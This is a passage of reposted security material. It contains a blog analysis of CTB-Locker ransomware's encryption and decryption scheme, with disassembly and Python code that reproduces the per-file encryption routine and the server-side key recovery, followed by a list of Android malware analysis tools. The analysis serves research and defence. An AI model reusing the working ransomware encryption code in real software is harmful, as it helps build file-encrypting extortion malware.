C74891 push eax ; Shared_2
C74892 call curve25519 ; Generate shared secret
C74897 lea eax, [ebp+50h+var_144]
C7489D push eax
C7489E lea eax, [ebp+50h+var_164]
C748A4 push 20h
C748A6 push eax ; Shared_2
C748A7 call SHA256Hash ; SHA256(Shared_2)
...
C74955 push 34h
C74957 push [ebp+50h+var_18] ; Compression level: 3
C7495A lea eax, [ebp+50h+PointerToFileToEncrypt]
C7495D push eax ; Original file bytes to compress
C7495E call ZLibCompress
...
C74B1F push [ebp+50h+var_4]
C74B22 lea ecx, [ebp+50h+expandedKey] ; SHA256(Shared_2) is used as key
C74B28 push [ebp+50h+var_4]
C74B2B call AES_Encrypt ; Encrypts 16 bytes per round, starting from the first 16 bytes of the ZLib-compressed file
C74B30 add [ebp+50h+var_4], 10h ; Advance the pointer to the next 16 bytes
C74B34 dec ebx ; One block less to encrypt
C74B35 jnz short loc_C74B1F ; Jump back and encrypt the next 16 bytes

It's quite easy indeed: the same primitives (SHA256, Curve25519, AES) are used, and to understand what's going on you only have to follow the code. The sequence of operations is:

CSecret = SHA256(0x30_random_bytes)
Curve_25519(CPublic, CSecret, BasePoint)
Curve_25519(Shared_2, CSecret, APublic)
AES_KEY_2 = SHA256(Shared_2)
ZLibFile = ZLibCompress(OriginalFile)
Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY_2)

DPublic inside the disassembled code is in fact APublic (the first 32 bytes of HiddenInfo). That's how CTB-Locker encrypts the bytes of the original file. These bytes are saved into the new compromised file together with some more data. A typical compromised file has the following structure:

+0x00 offset: CPublic
+0x20 offset: AES_Encrypt(InfoVector, AES_KEY_2)
+0x30 offset: AES_Encrypt(ZLibFile, AES_KEY_2)

InfoVector is a sequence of 16 bytes, the first four of which are equal to "CTB1"; this tag is used to check the correctness of the key provided by the server during the decryption routine. The decryption demonstration feature, implemented by the malware to prove that it can restore files, uses AES_KEY_2 directly: if you remember, that key is saved inside HiddenInfo (there are a total of five saved keys). In that case, if you have CSecret you can easily follow the process described above (remember that APublic comes from the first 32 bytes of HiddenInfo), but without CSecret it's impossible to restore the original files.

It's important to note that CTB-Locker doesn't need an open internet connection during the encryption process. It doesn't send keys/data to the server; it simply encrypts everything! An internet connection is needed for the decryption part only. A Python sketch of the per-file routine follows.
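This is the per-file routine in Python, under the same assumptions as before (ECB-like AES, zero padding up to the block size; how the original length is recovered after padding isn't covered here). APublic is read from the first 32 bytes of HiddenInfo.

import hashlib, os, zlib
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey, X25519PublicKey
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def encrypt_file(plaintext, a_public):
    c_secret = hashlib.sha256(os.urandom(0x30)).digest()    # CSecret = SHA256(0x30 random bytes)
    priv = X25519PrivateKey.from_private_bytes(c_secret)
    c_public = priv.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw)

    # Curve_25519(Shared_2, CSecret, APublic)
    shared_2 = priv.exchange(X25519PublicKey.from_public_bytes(a_public))
    aes_key_2 = hashlib.sha256(shared_2).digest()           # AES_KEY_2 = SHA256(Shared_2)

    compressed = zlib.compress(plaintext, 3)                # compression level 3
    compressed += b"\x00" * (-len(compressed) % 16)         # pad to the AES block size

    info_vector = b"CTB1" + b"\x00" * 12                    # 16-byte tag block
    enc = Cipher(algorithms.AES(aes_key_2), modes.ECB()).encryptor()
    body = enc.update(info_vector + compressed) + enc.finalize()

    # +0x00 CPublic, +0x20 encrypted InfoVector, +0x30 encrypted ZLib stream
    return c_public + body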
CTB-Locker file decryption

At some point, before the real decryption process, there's a data exchange between the infected machine and the malicious server. The malware sends a block of bytes (taken from HiddenInfo) to the server, and the server replies with the unique decryption key. The block is composed of the BPublic key, SecretInfo and some minor things:

DataToServer:
32 bytes: BPublic
90 bytes: SecretInfo
16 bytes: general info

The malware uses that key to restore the files. Do you remember the decryption part from my last post? Well, the real decryption scheme is not so different; there's one more step, the calculation of the AES key. The unique key sent by the server is used to decrypt every file:

curve_25519(Shared, Unique_Key, first_0x20_bytes_from_compromised_file)
AES_DECRYPTION_KEY = SHA256(Shared)
ZLibFile = AES_Decrypt(Encrypted_File, AES_DECRYPTION_KEY)
OriginalFile = ZLibDecompress(ZLibFile)

The unique key is sent just once, so the decryption routine needs only one key to decrypt all the compromised files. How is that possible?

My explanation

From the HiddenInfo part I have:

Curve_25519(APublic, ASecret, BasePoint)
Curve_25519(BPublic, BSecret, BasePoint)
Curve_25519(Shared_1, BSecret, MPublic)
AES_KEY_1 = SHA256(Shared_1)
Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1)

The server receives DataToServer and applies the elliptic-curve Diffie-Hellman principle:

Curve_25519(Shared_1, MSecret, BPublic)

The Shared_1 computed by the server is equal to the Shared_1 calculated during HiddenInfo creation. Now, with Shared_1, it AES-decrypts SecretInfo, obtaining the ASecret key. ASecret is the key used to decrypt all the compromised files. From the encryption part:

Curve_25519(CPublic, CSecret, BasePoint)
Curve_25519(Shared_2, CSecret, APublic)
AES_KEY_2 = SHA256(Shared_2)
ZLibFile = ZLibCompress(OriginalFile)
Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY_2)

That said, here is how ASecret is used in the decryption process (applying the same EC principle):

Curve_25519(Shared_2, ASecret, CPublic)
AES_KEY_2 = SHA256(Shared_2)
ZLibFile = AES_Decrypt(Encrypted_File, AES_KEY_2)
OriginalFile = ZLibDecompress(ZLibFile)

So, ASecret is the Unique_Key computed by the server, and it's used to decrypt every file. That means one thing only: without MSecret you can't restore your original files… The sketch below shows both sides of this exchange.
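The whole trick is the commutativity of the Diffie-Hellman exchange, and it's easy to demonstrate with the same toy functions used so far. server_recover_asecret is the server-side step (only the server holds MSecret); decrypt_file is what runs on the infected machine once ASecret comes back. Same ECB/padding assumptions as above.

import hashlib, zlib
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey, X25519PublicKey
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def server_recover_asecret(m_secret, b_public, encrypted_secret_info):
    # Curve_25519(Shared_1, MSecret, BPublic) == Curve_25519(Shared_1, BSecret, MPublic)
    shared_1 = X25519PrivateKey.from_private_bytes(m_secret).exchange(
        X25519PublicKey.from_public_bytes(b_public))
    dec = Cipher(algorithms.AES(hashlib.sha256(shared_1).digest()), modes.ECB()).decryptor()
    secret_info = dec.update(encrypted_secret_info) + dec.finalize()
    return secret_info[:32]                                 # ASecret is the first field

def decrypt_file(blob, a_secret):
    c_public, body = blob[:0x20], blob[0x20:]
    # Curve_25519(Shared_2, ASecret, CPublic) == Curve_25519(Shared_2, CSecret, APublic)
    shared_2 = X25519PrivateKey.from_private_bytes(a_secret).exchange(
        X25519PublicKey.from_public_bytes(c_public))
    dec = Cipher(algorithms.AES(hashlib.sha256(shared_2).digest()), modes.ECB()).decryptor()
    plain = dec.update(body) + dec.finalize()
    assert plain[:4] == b"CTB1"                             # InfoVector tag check
    d = zlib.decompressobj()
    return d.decompress(plain[16:])                         # trailing padding lands in d.unused_data

Note the symmetry: the victim machine never sees MSecret, and the server never sees the per-file CSecret values; ASecret bridges the two sides.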
Final thoughts

There's not much more to say, really. CTB-Locker is dangerous, and it will keep damaging systems for as long as people keep double-clicking attachments… sad but true. Feel free to contact me with comments, criticisms, suggestions, etc.!

Sursa: https://zairon.wordpress.com/2015/02/17/ctb-locker-encryptiondecryption-scheme-in-details/

24. Android Malware Analysis Tools

TOOLS
» AFLogical - Android forensics tool developed by viaForensics
» AndroChef - Java decompiler for apk, dex, jar and Java class files
» Androguard - Reverse engineering, malware and goodware analysis of Android applications
» Android Loadable Kernel Modules
» Android SDK
» Android4me - J2ME port of Google's Android
» Android-apktool - A tool for reverse engineering Android apk files
» Android-forensics - Open source Android forensics app and framework
» Android-random - Collection of extended examples for Android developers
» APK Studio - Android reverse engineering tool by Vaibhav Pandey a.k.a VPZ
» ApkAnalyser - Static, virtual analysis tool
» Apk-extractor - Android application (.apk) file extractor and parser for Android binary XML
» Apkinspector - Powerful GUI tool for analysts to analyze Android applications
» Apk-recovery - Recover main resources from your .apk file
» ART - GUI for all your decompiling and recompiling needs
» Audit tools
» Canhazaxs - A tool for enumerating the access to entries in the file system of an Android device
» Dava - Decompiler for arbitrary Java bytecode
» DDMS - Dalvik Debug Monitor Server
» Decaf-platform - DECAF binary analysis platform
» DecoJer - Java decompiler
» Dedexer - Disassembler tool for DEX files
» Device Monitor - Graphical user interface for several Android application debugging and analysis tools
» Dex2jar - Tools to work with Android .dex and Java .class files
» Dex-decompiler - Dex decompiler
» Dexinfo - A very rudimentary Android DEX file parser
» Dexter - Static Android application analysis tool
» Dexterity - Dex manipulation library
» Dextools - Miscellaneous DEX (Dalvik Executable) tools
» Drozer - Comprehensive security audit and attack framework for Android
» Heimdall - Cross-platform open-source tool suite used to flash firmware (aka ROMs) onto Samsung mobile devices
» Hidex - Demo application where a method named thisishidden() in class MrHyde is hidden from disassemblers but not called by the app
» Hooker - Automated dynamic analysis of Android applications
» JAD - Java decompiler
» JADX - Dex to Java decompiler
» JD-GUI - Standalone graphical utility that displays Java source code of ".class" files
» JEB Decompiler - The interactive Android decompiler
» Luyten - Java decompiler GUI for Procyon
» Radare - The reverse engineering framework
» Redexer - A Dalvik bytecode instrumentation framework
» Reverse Android - Reverse-engineering tools for Android applications
» Scalpel - A surgical debugging tool to uncover the layers under your app
» Smali - An assembler/disassembler for Android's dex format
» Soot - Java optimization framework
» STAMP - STatic Analysis of Mobile Programs
» Systrace - Analyze performance by capturing and displaying execution times of your applications and other Android system processes
» TaintDroid - Tracks how apps use sensitive information
» Traceview - Graphical viewer for execution logs saved by your application
» Undx - Bytecode translator
» Xenotix-APK-Decompiler - APK decompiler powered by dex2jar and JAD
» XML-apk-parser - Print AndroidManifest.xml directly from an apk file
» ZjDroid - Android app dynamic reverse tool based on the Xposed framework

UNPACKERS
» Android Unpacker - Android unpacker presented at Defcon 22 - Android Hacker Protection Level 0
» Dehoser - Unpacker for the HoseDex2Jar APK protection, which packs the original file inside the dex header
» Kisskiss - Unpacker for various Android packers/protectors
PACKERS / OBFUSCATORS
» Allatori
» APKfuscator - A generic DEX file obfuscator and munger
» APKProtect
» Bangcle
» DexGuard - Optimizer and obfuscator for Android
» HoseDex2Jar - Adds instructions to the classes.dex file that Dex2Jar cannot process
» ProGuard - Shrinks, optimizes, and obfuscates code by removing unused code and renaming classes, fields, and methods with semantically obscure names

TOOLKITS
» Android Malware Analysis Toolkit
» APK Resource Toolkit
» MobiSec
» Open Source Android Forensics Toolkit
» Santoku

SANDBOXES
» Android Sandbox
» Anubis
» APK Analyzer
» AVCaesar
» Droidbox
» HackApp
» Mobile Sandbox
» SandDroid
» VisualThreat

Sursa: http://www.nyxbone.com/malware/android_tools.html